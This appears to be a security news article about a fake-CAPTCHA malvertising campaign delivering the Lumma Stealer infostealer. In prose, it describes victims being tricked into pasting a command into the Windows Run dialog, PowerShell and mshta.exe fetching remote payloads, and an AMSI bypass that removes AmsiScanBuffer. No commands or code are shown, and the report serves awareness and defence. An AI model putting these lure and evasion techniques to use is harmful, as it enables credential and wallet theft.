.png?width=1816&height=566&name=brandmark-design%20(83).png "brandmark-design (83)")
Cybercriminals have launched a global malware campaign that has already impacted over 1.4 million users across multiple industries. Leveraging fake CAPTCHA verification pages, the attackers deploy the Lumma Stealer, a powerful information-stealing malware designed to exfiltrate sensitive data. The campaign utilizes advanced social engineering and malvertising tactics to bypass traditional security defenses by exploiting users' trust in routine web interactions. Victims have been identified in countries including the United States, Colombia, the Philippines, and Argentina.
In October 2024, researchers uncovered a malware campaign that used fake CAPTCHAs to deceive users. These fraudulent verification tools, typically designed to distinguish humans from bots, were manipulated to exploit users’ instinct to click through security prompts quickly. Experts from Russian cybersecurity firm Kaspersky reported that this campaign primarily targeted users through online ads, adult sites, file-sharing platforms, betting websites, anime hubs, and web apps that monetize traffic.
Earlier versions of the operation had focused on gamers, distributing information-stealing malware through websites offering cracked games. This recent iteration expanded its scope, posing a broader threat to unsuspecting users.
At first glance, the attack appears mundane: victims encounter what looks like a CAPTCHA verification screen, a familiar sight for most internet users. Via employing obfuscated JavaScript to deliver commands, the attackers ensure the malicious payload remains undetected during execution. The infection chain begins with malicious ads and ends with Lumma Stealer harvesting passwords, cookies, cryptocurrency wallets, and other sensitive information.
However, this is where the routine ends, and the deception begins.
- The Setup: Users are redirected to these fake CAPTCHA pages after clicking malicious ads embedded on compromised websites. These ads often mimic legitimate platforms, making them difficult to identify as malicious.
- The Trick: Victims are instructed to copy a command into their Windows Run dialog on these pages. This command—disguised as a harmless operation—is a Trojan horse, enabling the malware’s next steps.
- The Execution: The command executes a hidden PowerShell script that downloads and installs the Lumma Stealer payload via tools like mshta.exe, an often-abused Windows utility. This marks the start of the malware's operation: quietly stealing sensitive data while evading detection.
Victims now include corporate employees, individual users, and potentially even government entities. No sector is immune. On this backdrop, one of the most concerning aspects of the campaign is its ability to bypass security measures. The malware uses mshta.exe to execute malicious HTA files fetched from remote servers, evading browser-based security protocols. Lumma Stealer removes the AmsiScanBuffer function from memory, effectively bypassing the Windows Antimalware Scan Interface (AMSI).
Compared to earlier versions of the operation that targeted gamers by distributing information-stealing malware on websites offering cracked games, this campaign has broadened its scope to multiple industries. Since Lumma Stealer can exfiltrate sensitive data, including passwords, cookies, and cryptocurrency wallets, the campaign’s implications extend beyond individual users to corporate networks and proprietary information.
This is just the beginning. The threat will only escalate as attackers refine their techniques, leveraging advanced social engineering, fileless malware, and evasion tactics. The next wave of attacks could exploit even more ubiquitous tools, pushing boundaries to infiltrate critical systems and infrastructures.
